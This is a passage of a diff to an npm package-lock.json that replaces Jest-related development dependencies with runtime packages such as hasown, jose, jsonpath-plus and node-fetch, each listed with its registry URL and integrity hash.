"MIT", "dependencies": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "slash": "^3.0.0" + "dunder-proto": "^1.0.1", + "es-object-atoms": "^1.0.0" }, "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">= 0.4" } }, - "node_modules/@jest/core": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/core/-/core-29.6.1.tgz", - "integrity": "sha512-CcowHypRSm5oYQ1obz1wfvkjZZ2qoQlrKKvlfPwh5jUXVU12TWr2qMeH8chLMuTFzHh5a1g2yaqlqDICbr+ukQ==", - "dev": true, - "dependencies": { - "@jest/console": "^29.6.1", - "@jest/reporters": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-changed-files": "^29.5.0", - "jest-config": "^29.6.1", - "jest-haste-map": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-resolve-dependencies": "^29.6.1", - "jest-runner": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "jest-watcher": "^29.6.1", - "micromatch": "^4.0.4", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "strip-ansi": "^6.0.0" - }, + "node_modules/gopd": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/gopd/-/gopd-1.2.0.tgz", + "integrity": "sha512-ZUKRh6/kUFoAiTAtTYPZJ3hw9wNxx+BIBOijnlG9PnrJsCcSjs1wyyD6vJpaYtgnzDrKYRSqf3OO6Rfa93xsRg==", + "license": "MIT", "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" + "node": ">= 0.4" }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } + "funding": { + "url": "https://github.com/sponsors/ljharb" } }, - "node_modules/@jest/environment": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-29.6.1.tgz", - "integrity": "sha512-RMMXx4ws+Gbvw3DfLSuo2cfQlK7IwGbpuEWXCqyYDcqYTI+9Ju3a5hDnXaxjNsa6uKh9PQF2v+qg+RLe63tz5A==", - "dev": true, - "dependencies": { - "@jest/fake-timers": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-mock": "^29.6.1" - }, + "node_modules/has-symbols": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/has-symbols/-/has-symbols-1.1.0.tgz", + "integrity": "sha512-1cDNdwJ2Jaohmb3sg4OmKaMBwuC48sYni5HUw2DvsC8LjGTLK9h+eb1X6RyuOHe4hT0ULCW68iomhjUoKUqlPQ==", + "license": "MIT", "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" } }, - "node_modules/@jest/expect": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-29.6.1.tgz", - "integrity": "sha512-N5xlPrAYaRNyFgVf2s9Uyyvr795jnB6rObuPx4QFvNJz8aAjpZUDfO4bh5G/xuplMID8PrnuF1+SfSyDxhsgYg==", - "dev": true, + "node_modules/has-tostringtag": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/has-tostringtag/-/has-tostringtag-1.0.2.tgz", + "integrity": "sha512-NqADB8VjPFLM2V0VvHUewwwsw0ZWBaIdgo+ieHtK3hasLz4qeCRjYcqfB6AQrBggRKppKF8L52/VqdVsO47Dlw==", + "license": "MIT", "dependencies": { - "expect": "^29.6.1", - "jest-snapshot": "^29.6.1" + "has-symbols": "^1.0.3" }, "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" } }, - "node_modules/@jest/expect-utils": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-29.6.1.tgz", - "integrity": "sha512-o319vIf5pEMx0LmzSxxkYYxo4wrRLKHq9dP1yJU7FoPTB0LfAKSz8SWD6D/6U3v/O52t9cF5t+MeJiRsfk7zMw==", - "dev": true, + "node_modules/hasown": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.2.tgz", + "integrity": "sha512-0hJU9SCPvmMzIBdZFqNPXWa6dqh7WdH0cII9y+CyS8rG3nL48Bclra9HmKhVVUHyPWNH5Y7xDwAB7bfgSjkUMQ==", + "license": "MIT", "dependencies": { - "jest-get-type": "^29.4.3" + "function-bind": "^1.1.2" }, "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">= 0.4" } }, - "node_modules/@jest/fake-timers": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-29.6.1.tgz", - "integrity": "sha512-RdgHgbXyosCDMVYmj7lLpUwXA4c69vcNzhrt69dJJdf8azUrpRh3ckFCaTPNjsEeRi27Cig0oKDGxy5j7hOgHg==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "@sinonjs/fake-timers": "^10.0.2", - "@types/node": "*", - "jest-message-util": "^29.6.1", - "jest-mock": "^29.6.1", - "jest-util": "^29.6.1" - }, + "node_modules/hpagent": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/hpagent/-/hpagent-1.2.0.tgz", + "integrity": "sha512-A91dYTeIB6NoXG+PxTQpCCDDnfHsW9kc06Lvpu1TEe9gnd6ZFeiBoRO9JvzEv6xK7EX97/dUE8g/vBMTqTS3CA==", + "license": "MIT", "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">=14" } }, - "node_modules/@jest/globals": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-29.6.1.tgz", - "integrity": "sha512-2VjpaGy78JY9n9370H8zGRCFbYVWwjY6RdDMhoJHa1sYfwe6XM/azGN0SjY8kk7BOZApIejQ1BFPyH7FPG0w3A==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.6.1", - "@jest/expect": "^29.6.1", - "@jest/types": "^29.6.1", - "jest-mock": "^29.6.1" - }, + "node_modules/ip-address": { + "version": "10.0.1", + "resolved": "https://registry.npmjs.org/ip-address/-/ip-address-10.0.1.tgz", + "integrity": "sha512-NWv9YLW4PoW2B7xtzaS3NCot75m6nK7Icdv0o3lfMceJVRfSoQwqD4wEH5rLwoKJwUiZ/rfpiVBhnaF0FK4HoA==", + "license": "MIT", "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">= 12" } }, - "node_modules/@jest/reporters": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/reporters/-/reporters-29.6.1.tgz", - "integrity": "sha512-9zuaI9QKr9JnoZtFQlw4GREQbxgmNYXU6QuWtmuODvk5nvPUeBYapVR/VYMyi2WSx3jXTLJTJji8rN6+Cm4+FA==", - "dev": true, - "dependencies": { - "@bcoe/v8-coverage": "^0.2.3", - "@jest/console": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@jridgewell/trace-mapping": "^0.3.18", - "@types/node": "*", - "chalk": "^4.0.0", - "collect-v8-coverage": "^1.0.0", - "exit": "^0.1.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "istanbul-lib-coverage": "^3.0.0", - "istanbul-lib-instrument": "^5.1.0", - "istanbul-lib-report": "^3.0.0", - "istanbul-lib-source-maps": "^4.0.0", - "istanbul-reports": "^3.1.3", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "jest-worker": "^29.6.1", - "slash": "^3.0.0", - "string-length": "^4.0.1", - "strip-ansi": "^6.0.0", - "v8-to-istanbul": "^9.0.1" - }, + "node_modules/ip-regex": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/ip-regex/-/ip-regex-5.0.0.tgz", + "integrity": "sha512-fOCG6lhoKKakwv+C6KdsOnGvgXnmgfmp0myi3bcNwj3qfwPAxRKWEuFhvEFF7ceYIz6+1jRZ+yguLFAmUNPEfw==", + "license": "MIT", "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" + "node": "^12.20.0 || ^14.13.1 || >=16.0.0" }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } + "funding": { + "url": "https://github.com/sponsors/sindresorhus" } }, - "node_modules/@jest/schemas": { - "version": "29.6.0", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.6.0.tgz", - "integrity": "sha512-rxLjXyJBTL4LQeJW3aKo0M/+GkCOXsO+8i9Iu7eDb6KwtP65ayoDsitrdPBtujxQ88k4wI2FNYfa6TOGwSn6cQ==", - "dev": true, + "node_modules/is-ip": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/is-ip/-/is-ip-5.0.1.tgz", + "integrity": "sha512-FCsGHdlrOnZQcp0+XT5a+pYowf33itBalCl+7ovNXC/7o5BhIpG14M3OrpPPdBSIQJCm+0M5+9mO7S9VVTTCFw==", + "license": "MIT", "dependencies": { - "@sinclair/typebox": "^0.27.8" + "ip-regex": "^5.0.0", + "super-regex": "^0.2.0" }, "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">=14.16" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" } }, - "node_modules/@jest/source-map": { - "version": "29.6.0", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-29.6.0.tgz", - "integrity": "sha512-oA+I2SHHQGxDCZpbrsCQSoMLb3Bz547JnM+jUr9qEbuw0vQlWZfpPS7CO9J7XiwKicEz9OFn/IYoLkkiUD7bzA==", - "dev": true, - "dependencies": { - "@jridgewell/trace-mapping": "^0.3.18", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" - }, + "node_modules/is-regexp": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/is-regexp/-/is-regexp-3.1.0.tgz", + "integrity": "sha512-rbku49cWloU5bSMI+zaRaXdQHXnthP6DZ/vLnfdSKyL4zUzuWnomtOEiZZOd+ioQ+avFo/qau3KPTc7Fjy1uPA==", + "license": "MIT", "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">=12" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" } }, - "node_modules/@jest/test-result": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-29.6.1.tgz", - "integrity": "sha512-Ynr13ZRcpX6INak0TPUukU8GWRfm/vAytE3JbJNGAvINySWYdfE7dGZMbk36oVuK4CigpbhMn8eg1dixZ7ZJOw==", - "dev": true, - "dependencies": { - "@jest/console": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node_modules/isomorphic-ws": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/isomorphic-ws/-/isomorphic-ws-5.0.0.tgz", + "integrity": "sha512-muId7Zzn9ywDsyXgTIafTry2sV3nySZeUDe6YedVd1Hvuuep5AsIlqK+XefWpYTyJG5e503F2xIuT2lcU6rCSw==", + "license": "MIT", + "peerDependencies": { + "ws": "*" } }, - "node_modules/@jest/test-sequencer": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/test-sequencer/-/test-sequencer-29.6.1.tgz", - "integrity": "sha512-oBkC36PCDf/wb6dWeQIhaviU0l5u6VCsXa119yqdUosYAt7/FbQU2M2UoziO3igj/HBDEgp57ONQ3fm0v9uyyg==", - "dev": true, - "dependencies": { - "@jest/test-result": "^29.6.1", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node_modules/jose": { + "version": "6.0.11", + "resolved": "https://registry.npmjs.org/jose/-/jose-6.0.11.tgz", + "integrity": "sha512-QxG7EaliDARm1O1S8BGakqncGT9s25bKL1WSf6/oa17Tkqwi8D2ZNglqCF+DsYF88/rV66Q/Q2mFAy697E1DUg==", + "license": "MIT", + "funding": { + "url": "https://github.com/sponsors/panva" } }, - "node_modules/@jest/transform": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.6.1.tgz", - "integrity": "sha512-URnTneIU3ZjRSaf906cvf6Hpox3hIeJXRnz3VDSw5/X93gR8ycdfSIEy19FlVx8NFmpN7fe3Gb1xF+NjXaQLWg==", - "dev": true, + "node_modules/js-yaml": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-4.1.0.tgz", + "integrity": "sha512-wpxZs9NoxZaJESJGIZTyDEaYpl0FKSA+FB9aJiyemKhMwkxQg63h4T1KJgUGHpTqPDNRcmmYLugrRjJlBtWvRA==", + "license": "MIT", "dependencies": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.6.1", - "@jridgewell/trace-mapping": "^0.3.18", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-util": "^29.6.1", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^4.0.2" + "argparse": "^2.0.1" }, + "bin": { + "js-yaml": "bin/js-yaml.js" + } + }, + "node_modules/jsbn": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-1.1.0.tgz", + "integrity": "sha512-4bYVV3aAMtDTTu4+xsDYa6sy9GyJ69/amsu9sYF2zqjiEoZA5xJi3BrfX3uY+/IekIu7MwdObdbDWpoZdBv3/A==", + "license": "MIT" + }, + "node_modules/jsep": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/jsep/-/jsep-1.4.0.tgz", + "integrity": "sha512-B7qPcEVE3NVkmSJbaYxvv4cHkVW7DQsZz13pUMrfS8z8Q/BuShN+gcTXrUlPiGqM2/t/EEaI030bpxMqY8gMlw==", + "license": "MIT", "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">= 10.16.0" } }, - "node_modules/@jest/types": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.6.1.tgz", - "integrity": "sha512-tPKQNMPuXgvdOn2/Lg9HNfUvjYVGolt04Hp03f5hAk878uwOLikN+JzeLY0HcVgKgFl9Hs3EIqpu3WX27XNhnw==", - "dev": true, + "node_modules/jsonpath-plus": { + "version": "10.3.0", + "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-10.3.0.tgz", + "integrity": "sha512-8TNmfeTCk2Le33A3vRRwtuworG/L5RrgMvdjhKZxvyShO+mBu2fP50OWUjRLNtvw344DdDarFh9buFAZs5ujeA==", + "license": "MIT", "dependencies": { - "@jest/schemas": "^29.6.0", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" + "@jsep-plugin/assignment": "^1.3.0", + "@jsep-plugin/regex": "^1.0.4", + "jsep": "^1.4.0" + }, + "bin": { + "jsonpath": "bin/jsonpath-cli.js", + "jsonpath-plus": "bin/jsonpath-cli.js" }, "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">=18.0.0" } }, - "node_modules/@jridgewell/gen-mapping": { - "version": "0.3.3", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.3.tgz", - "integrity": "sha512-HLhSWOLRi875zjjMG/r+Nv0oCW8umGb0BgEhyX3dDX3egwZtB8PqLnjz3yedt8R5StBrzcg4aBpnh8UA9D1BoQ==", - "dev": true, + "node_modules/lodash-es": { + "version": "4.17.21", + "resolved": "https://registry.npmjs.org/lodash-es/-/lodash-es-4.17.21.tgz", + "integrity": "sha512-mKnC+QJ9pWVzv+C4/U3rRsHapFfHvQFoFB92e52xeyGMcX6/OlIl78je1u8vePzYZSkkogMPJ2yjxxsb89cxyw==", + "license": "MIT" + }, + "node_modules/matcher": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/matcher/-/matcher-5.0.0.tgz", + "integrity": "sha512-s2EMBOWtXFc8dgqvoAzKJXxNHibcdJMV0gwqKUaw9E2JBJuGUK7DrNKrA6g/i+v72TT16+6sVm5mS3thaMLQUw==", + "license": "MIT", "dependencies": { - "@jridgewell/set-array": "^1.0.1", - "@jridgewell/sourcemap-codec": "^1.4.10", - "@jridgewell/trace-mapping": "^0.3.9" + "escape-string-regexp": "^5.0.0" }, "engines": { - "node": ">=6.0.0" + "node": "^12.20.0 || ^14.13.1 || >=16.0.0" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" } }, - "node_modules/@jridgewell/resolve-uri": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.0.tgz", - "integrity": "sha512-F2msla3tad+Mfht5cJq7LSXcdudKTWCVYUgw6pLFOOHSTtZlj6SWNYAp+AhuqLmWdBO2X5hPrLcu8cVP8fy28w==", - "dev": true, + "node_modules/math-intrinsics": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/math-intrinsics/-/math-intrinsics-1.1.0.tgz", + "integrity": "sha512-/IXtbwEk5HTPyEwyKX6hGkYXxM9nbj64B+ilVJnC/R6B0pH5G4V3b0pVbL7DBj4tkhBAppbQUlf6F6Xl9LHu1g==", + "license": "MIT", "engines": { - "node": ">=6.0.0" + "node": ">= 0.4" } }, - "node_modules/@jridgewell/set-array": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.1.2.tgz", - "integrity": "sha512-xnkseuNADM0gt2bs+BvhO0p78Mk762YnZdsuzFV018NoG1Sj1SCQvpSqa7XUaTam5vAGasABV9qXASMKnFMwMw==", - "dev": true, + "node_modules/mime-db": { + "version": "1.52.0", + "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", + "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==", + "license": "MIT", "engines": { - "node": ">=6.0.0" + "node": ">= 0.6" } }, - "node_modules/@jridgewell/sourcemap-codec": { - "version": "1.4.15", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.15.tgz", - "integrity": "sha512-eF2rxCRulEKXHTRiDrDy6erMYWqNw4LPdQ8UQA4huuxaQsVeRPFl2oM8oDGxMFhJUWZf9McpLtJasDDZb/Bpeg==", - "dev": true - }, - "node_modules/@jridgewell/trace-mapping": { - "version": "0.3.18", - "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.18.tgz", - "integrity": "sha512-w+niJYzMHdd7USdiH2U6869nqhD2nbfZXND5Yp93qIbEmnDNk7PD48o+YchRVpzMU7M6jVCbenTR7PA1FLQ9pA==", - "dev": true, + "node_modules/mime-types": { + "version": "2.1.35", + "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", + "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", + "license": "MIT", "dependencies": { - "@jridgewell/resolve-uri": "3.1.0", - "@jridgewell/sourcemap-codec": "1.4.14" + "mime-db": "1.52.0" + }, + "engines": { + "node": ">= 0.6" } }, - "node_modules/@jridgewell/trace-mapping/node_modules/@jridgewell/sourcemap-codec": { - "version": "1.4.14", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.14.tgz", - "integrity": "sha512-XPSJHWmi394fuUuzDnGz1wiKqWfo1yXecHQMRf2l6hztTO+nPru658AyDngaBe7isIxEkRsPR3FZh+s7iVa4Uw==", - "dev": true + "node_modules/ms": { + "version": "2.1.3", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.3.tgz", + "integrity": "sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==", + "license": "MIT" }, - "node_modules/@kubernetes/client-node": { - "version": "0.19.0", - "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-0.19.0.tgz", - "integrity": "sha512-WTOjGuFQ8yeW3+qD6JrAYhpwpoQbe9R8cA/61WCyFrNawSTUgLstHu7EsZRYEs39er3jDn3wCEaczz+VOFlc2Q==", - "dependencies": { - "@types/js-yaml": "^4.0.1", - "@types/node": "^20.1.1", - "@types/request": "^2.47.1", - "@types/ws": "^8.5.3", - "byline": "^5.0.0", - "isomorphic-ws": "^5.0.0", - "js-yaml": "^4.1.0", - "jsonpath-plus": "^7.2.0", - "request": "^2.88.0", - "rfc4648": "^1.3.0", - "stream-buffers": "^3.0.2", - "tar": "^6.1.11", - "tslib": "^2.4.1", - "ws": "^8.11.0" - }, - "optionalDependencies": { - "openid-client": "^5.3.0" - } - }, - "node_modules/@kubernetes/client-node/node_modules/@types/node": { - "version": "20.8.10", - "resolved": "https://registry.npmjs.org/@types/node/-/node-20.8.10.tgz", - "integrity": "sha512-TlgT8JntpcbmKUFzjhsyhGfP2fsiz1Mv56im6enJ905xG1DAYesxJaeSbGqQmAw8OWPdhyJGhGSQGKRNJ45u9w==", - "dependencies": { - "undici-types": "~5.26.4" - } - }, - "node_modules/@nicolo-ribaudo/semver-v6": { - "version": "6.3.3", - "resolved": "https://registry.npmjs.org/@nicolo-ribaudo/semver-v6/-/semver-v6-6.3.3.tgz", - "integrity": "sha512-3Yc1fUTs69MG/uZbJlLSI3JISMn2UV2rg+1D/vROUqZyh3l6iYHCs7GMp+M40ZD7yOdDbYjJcU1oTJhrc+dGKg==", - "dev": true, + "node_modules/mustache": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/mustache/-/mustache-4.2.0.tgz", + "integrity": "sha512-71ippSywq5Yb7/tVYyGbkBggbU8H3u5Rz56fH60jGFgr8uHwxs+aSKeqmluIVzM0m0kB7xQjKS6qPfd0b2ZoqQ==", "bin": { - "semver": "bin/semver.js" - } - }, - "node_modules/@sinclair/typebox": { - "version": "0.27.8", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.27.8.tgz", - "integrity": "sha512-+Fj43pSMwJs4KRrH/938Uf+uAELIgVBmQzg/q1YG10djyfA3TnrU8N8XzqCh/okZdszqBQTZf96idMfE5lnwTA==", - "dev": true - }, - "node_modules/@sinonjs/commons": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-3.0.0.tgz", - "integrity": "sha512-jXBtWAF4vmdNmZgD5FoKsVLv3rPgDnLgPbU84LIJ3otV44vJlDRokVng5v8NFJdCf/da9legHcKaRuZs4L7faA==", - "dev": true, - "dependencies": { - "type-detect": "4.0.8" - } - }, - "node_modules/@sinonjs/fake-timers": { - "version": "10.3.0", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-10.3.0.tgz", - "integrity": "sha512-V4BG07kuYSUkTCSBHG8G8TNhM+F19jXFWnQtzj+we8DrkpSBCee9Z3Ms8yiGer/dlmhe35/Xdgyo3/0rQKg7YA==", - "dev": true, - "dependencies": { - "@sinonjs/commons": "^3.0.0" - } - }, - "node_modules/@types/babel__core": { - "version": "7.20.1", - "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.20.1.tgz", - "integrity": "sha512-aACu/U/omhdk15O4Nfb+fHgH/z3QsfQzpnvRZhYhThms83ZnAOZz7zZAWO7mn2yyNQaA4xTO8GLK3uqFU4bYYw==", - "dev": true, - "dependencies": { - "@babel/parser": "^7.20.7", - "@babel/types": "^7.20.7", - "@types/babel__generator": "*", - "@types/babel__template": "*", - "@types/babel__traverse": "*" - } - }, - "node_modules/@types/babel__generator": { - "version": "7.6.4", - "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.4.tgz", - "integrity": "sha512-tFkciB9j2K755yrTALxD44McOrk+gfpIpvC3sxHjRawj6PfnQxrse4Clq5y/Rq+G3mrBurMax/lG8Qn2t9mSsg==", - "dev": true, - "dependencies": { - "@babel/types": "^7.0.0" - } - }, - "node_modules/@types/babel__template": { - "version": "7.4.1", - "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.1.tgz", - "integrity": "sha512-azBFKemX6kMg5Io+/rdGT0dkGreboUVR0Cdm3fz9QJWpaQGJRQXl7C+6hOTCZcMll7KFyEQpgbYI2lHdsS4U7g==", - "dev": true, - "dependencies": { - "@babel/parser": "^7.1.0", - "@babel/types": "^7.0.0" - } - }, - "node_modules/@types/babel__traverse": { - "version": "7.20.1", - "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.20.1.tgz", - "integrity": "sha512-MitHFXnhtgwsGZWtT68URpOvLN4EREih1u3QtQiN4VdAxWKRVvGCSvw/Qth0M0Qq3pJpnGOu5JaM/ydK7OGbqg==", - "dev": true, - "dependencies": { - "@babel/types": "^7.20.7" - } - }, - "node_modules/@types/caseless": { - "version": "0.12.2", - "resolved": "https://registry.npmjs.org/@types/caseless/-/caseless-0.12.2.tgz", - "integrity": "sha512-6ckxMjBBD8URvjB6J3NcnuAn5Pkl7t3TizAg+xdlzzQGSPSmBcXf8KoIH0ua/i+tio+ZRUHEXp0HEmvaR4kt0w==" - }, - "node_modules/@types/graceful-fs": { - "version": "4.1.6", - "resolved": "https://registry.npmjs.org/@types/graceful-fs/-/graceful-fs-4.1.6.tgz", - "integrity": "sha512-Sig0SNORX9fdW+bQuTEovKj3uHcUL6LQKbCrrqb1X7J6/ReAbhCXRAhc+SMejhLELFj2QcyuxmUooZ4bt5ReSw==", - "dev": true, - "dependencies": { - "@types/node": "*" - } - }, - "node_modules/@types/ip-address": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/@types/ip-address/-/ip-address-7.0.0.tgz", - "integrity": "sha512-OyDm4EwZsYPDUjXz3ktiuQE8PJIPO1uUZMfvZMcWmykWjm3WVyI78rAnHkqKV3pMR7iDRKfalI+RxG5JBDUo5w==", - "deprecated": "This is a stub types definition. ip-address provides its own type definitions, so you do not need this installed.", - "dev": true, - "dependencies": { - "ip-address": "*" - } - }, - "node_modules/@types/istanbul-lib-coverage": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.4.tgz", - "integrity": "sha512-z/QT1XN4K4KYuslS23k62yDIDLwLFkzxOuMplDtObz0+y7VqJCaO2o+SPwHCvLFZh7xazvvoor2tA/hPz9ee7g==", - "dev": true - }, - "node_modules/@types/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", - "dev": true, - "dependencies": { - "@types/istanbul-lib-coverage": "*" - } - }, - "node_modules/@types/istanbul-reports": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.1.tgz", - "integrity": "sha512-c3mAZEuK0lvBp8tmuL74XRKn1+y2dcwOUpH7x4WrF6gk1GIgiluDRgMYQtw2OFcBvAJWlt6ASU3tSqxp0Uu0Aw==", - "dev": true, - "dependencies": { - "@types/istanbul-lib-report": "*" + "mustache": "bin/mustache" } }, - "node_modules/@types/jest": { - "version": "29.5.3", - "resolved": "https://registry.npmjs.org/@types/jest/-/jest-29.5.3.tgz", - "integrity": "sha512-1Nq7YrO/vJE/FYnqYyw0FS8LdrjExSgIiHyKg7xPpn+yi8Q4huZryKnkJatN1ZRH89Kw2v33/8ZMB7DuZeSLlA==", - "dev": true, + "node_modules/node-fetch": { + "version": "2.7.0", + "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.7.0.tgz", + "integrity": "sha512-c4FRfUm/dbcWZ7U+1Wq0AwCyFL+3nt2bEw05wfxSz+DWpWsitgmSgYmy2dQdWyKC1694ELPqMs/YzUSNozLt8A==", + "license": "MIT", "dependencies": { - "expect": "^29.0.0", - "pretty-format": "^29.0.0" + "whatwg-url": "^5.0.0" + }, + "engines": { + "node": "4.x || >=6.0.0" + }, + "peerDependencies": { + "encoding": "^0.1.0" + }, + "peerDependenciesMeta": { + "encoding": { + "optional": true + } } }, - "node_modules/@types/js-yaml": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/@types/js-yaml/-/js-yaml-4.0.5.tgz", - "integrity": "sha512-FhpRzf927MNQdRZP0J5DLIdTXhjLYzeUTmLAu69mnVksLH9CJY3IuSeEgbKUki7GQZm0WqDkGzyxju2EZGD2wA==" 